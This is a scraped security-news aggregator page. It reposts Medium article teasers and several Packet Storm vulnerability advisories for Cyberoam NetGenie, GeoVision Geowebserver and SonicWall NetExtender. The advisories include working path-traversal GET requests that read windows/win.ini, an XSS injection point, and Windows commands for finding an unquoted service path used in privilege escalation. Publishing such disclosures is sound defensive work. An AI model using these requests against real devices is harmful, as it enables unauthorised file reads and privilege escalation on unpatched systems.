Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus
https://cdn-images-1.medium.com/max/741/0*cMit04EjHUXj1PkK
Gaining SYSTEM access via the help desk software
Continue reading on Tenable TechBlog »
Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus
https://cdn-images-1.medium.com/max/741/0*cMit04EjHUXj1PkK
Gaining SYSTEM access via the help desk software
Continue reading on Tenable TechBlog »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
School security has to include cyber too
https://cdn-images-1.medium.com/max/2600/1*N7MGxGONknhyzhvAQO66FQ.jpeg
Physical security at schools, from disease and violence, is important. But so is cybersecurity.
Continue reading on Nerd For Tech »
School security has to include cyber too
https://cdn-images-1.medium.com/max/2600/1*N7MGxGONknhyzhvAQO66FQ.jpeg
Physical security at schools, from disease and violence, is important. But so is cybersecurity.
Continue reading on Nerd For Tech »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Everything you need you know about Ethical Hacking Certifications
Pen Testing Certs Roundup (eJPT, eCPT, PNPT, OSCP, OSCE, eWPT, etc)
Continue reading on Medium »
Everything you need you know about Ethical Hacking Certifications
Pen Testing Certs Roundup (eJPT, eCPT, PNPT, OSCP, OSCE, eWPT, etc)
Continue reading on Medium »
Pentesting an API for Fun and Learning
Want to learn API pentesting? This post will answer most of the questions you have been craving for and give great tips on API pentesting!Continue reading on Medium »
Read more...
Want to learn API pentesting? This post will answer most of the questions you have been craving for and give great tips on API pentesting!Continue reading on Medium »
Read more...
Pentesting an API for Fun and Learning
https://securitygoat.medium.com/pentesting-an-api-for-fun-and-learning-b7b4801ff12?source=rss------bug_bounty-5
https://securitygoat.medium.com/pentesting-an-api-for-fun-and-learning-b7b4801ff12?source=rss------bug_bounty-5
Want to learn API pentesting? This post will answer most of the questions you have been craving for and give great tips on API pentesting!Continue reading on Medium » (https://securitygoat.medium.com/pentesting-an-api-for-fun-and-learning-b7b4801ff12?source=rss------bug_bounty-5)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Cyberoam NetGenie Cross Site Scripting
https://4.bp.blogspot.com/-4IgemuXxvlQ/WWlvJOAjEHI/AAAAAAAAIL4/GJdo6H5fQo4z7HKyurc-fIH3InSyWxX3gCLcBGAs/s1600/h145.png
Cyberoam NetGenie with a firmware version of C0101B1-20141120-NG11VO suffers from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Cyberoam NetGenie Cross Site Scripting
https://4.bp.blogspot.com/-4IgemuXxvlQ/WWlvJOAjEHI/AAAAAAAAIL4/GJdo6H5fQo4z7HKyurc-fIH3InSyWxX3gCLcBGAs/s1600/h145.png
Cyberoam NetGenie with a firmware version of C0101B1-20141120-NG11VO suffers from a cross site scripting vulnerability.
MD5 |
23d3c96b793c9e3fb0836031803341daDownload
# Title: Cyberoam NetGenie (C0101B1-20141120-NG11VO) - Reflected Cross Site Scripting (XSS)
# Date: 14.08.2021
# Credit: Gionathan "John" Reale
# Firmware Version: C0101B1-20141120-NG11VO
# CVE-2021-38702
################################################################################
DESCRIPTION:
Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow tweb/ft.php?u=[XSS] attacks.
POC:
After connecting to the network via the NetGenie router a page is displayed suggesting a redirect, within the redirect parameter it is possible to execute reflected Cross Site Scripting, the component affected is "hxxp:/URL/tweb/ft.php?u="
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
GeoVision Geowebserver 5.3.3 LFI / XSS / CSRF / Code Execution
https://4.bp.blogspot.com/-JipZY3hUF7s/WWlu7l1ccBI/AAAAAAAAIJc/HAISYb4KBsQdeIf6OzzYRuXiYaIkpQnmACLcBGAs/s1600/h110.png
GeoVision Geowebserver versions 5.3.3 and below suffer from code execution, cross site request forgery, cross site scripting, html injection, and local file inclusion vulnerabilities.
MD5 |
Download
Source:packetstormsecurity.com
GeoVision Geowebserver 5.3.3 LFI / XSS / CSRF / Code Execution
https://4.bp.blogspot.com/-JipZY3hUF7s/WWlu7l1ccBI/AAAAAAAAIJc/HAISYb4KBsQdeIf6OzzYRuXiYaIkpQnmACLcBGAs/s1600/h110.png
GeoVision Geowebserver versions 5.3.3 and below suffer from code execution, cross site request forgery, cross site scripting, html injection, and local file inclusion vulnerabilities.
MD5 |
7f0018d2193589d1334f12f6ebcc8843Download
# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM
# Date: 6-16-21 (Vendor Notified)
# Exploit Author: Ken 's1ngular1ty' Pyle
# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php
# Version: <=
# Tested on: Windows 20XX / MULTIPLE
# CVE : https://www.geovision.com.tw/cyber_security.php
GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft:
Nested Exploitation of the LFI, XSS, HTML / Browser Injection:
GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<iframe%20src="" HTTP/1.1
Absolute exploitation of the LFI:
POST /Visitor/bin/WebStrings.srf?obj_name=win.ini
GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini
Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.
ex. obj_name=INJECTEDHTML / XSS
The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors:
ex. /Visitor//%252e(path to target)
These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:
The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.
These attacks were disclosed as part of the IOTVillage Presentation:
https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
SonicWall NetExtender 10.2.0.300 Unquoted Service Path
https://3.bp.blogspot.com/-D44pcoGQpVY/WWlvlv4DR7I/AAAAAAAAIRA/cd0U1aMX9aAjFzK0BP_4B5_C_6s8ROTKQCLcBGAs/s1600/h99.png
SonicWall NetExtender version 10.2.0.300 suffers from an unquoted service path vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
SonicWall NetExtender 10.2.0.300 Unquoted Service Path
https://3.bp.blogspot.com/-D44pcoGQpVY/WWlvlv4DR7I/AAAAAAAAIRA/cd0U1aMX9aAjFzK0BP_4B5_C_6s8ROTKQCLcBGAs/s1600/h99.png
SonicWall NetExtender version 10.2.0.300 suffers from an unquoted service path vulnerability.
MD5 |
fa624f197df2e6cb5729e670d942f864Download
# Exploit Title: SonicWall NetExtender 10.2.0.300 - Unquoted Service Path
# Exploit Author: shinnai
# Software Link: https://www.sonicwall.com/products/remote-access/vpn-clients/
# Version: 10.2.0.300
# Tested On: Windows
# CVE: CVE-2020-5147
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Title: SonicWall NetExtender windows client unquoted service path
vulnerability
Vers.: 10.2.0.300
Down.: https://www.sonicwall.com/products/remote-access/vpn-clients/
Advisory:
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0023
CVE ID: CVE-2020-5147 (https://nvd.nist.gov/vuln/detail/CVE-2020-5147)
URLs:
https://besteffortteam.it/sonicwall-netextender-windows-client-unquoted-service-path-vulnerability/
https://shinnai.altervista.org/exploits/SH-029-20210109.html
Desc.:
SonicWall NetExtender Windows client vulnerable to unquoted service path
vulnerability, this allows a local attacker to gain elevated privileges
in the host operating system.
This vulnerability impact SonicWall NetExtender Windows client version
10.2.300 and earlier.
Poc:
C:\>sc qc sonicwall_client_protection_svc
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: sonicwall_client_protection_svc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files\SonicWall\Client
Protection Service\SonicWallClientProtectionService.exe <--
Service Path Vulnerability
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : SonicWall Client Protection Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
C:\>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
C:\>wmic service get name,displayname,pathname,startmode |findstr /i
"auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
SonicWall Client Protection Service
sonicwall_client_protection_svc C:\Program Files\SonicWall\Client
Protection Service\SonicWallClientProtectionService.exe Auto
C:\>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
Source:packetstormsecurity.com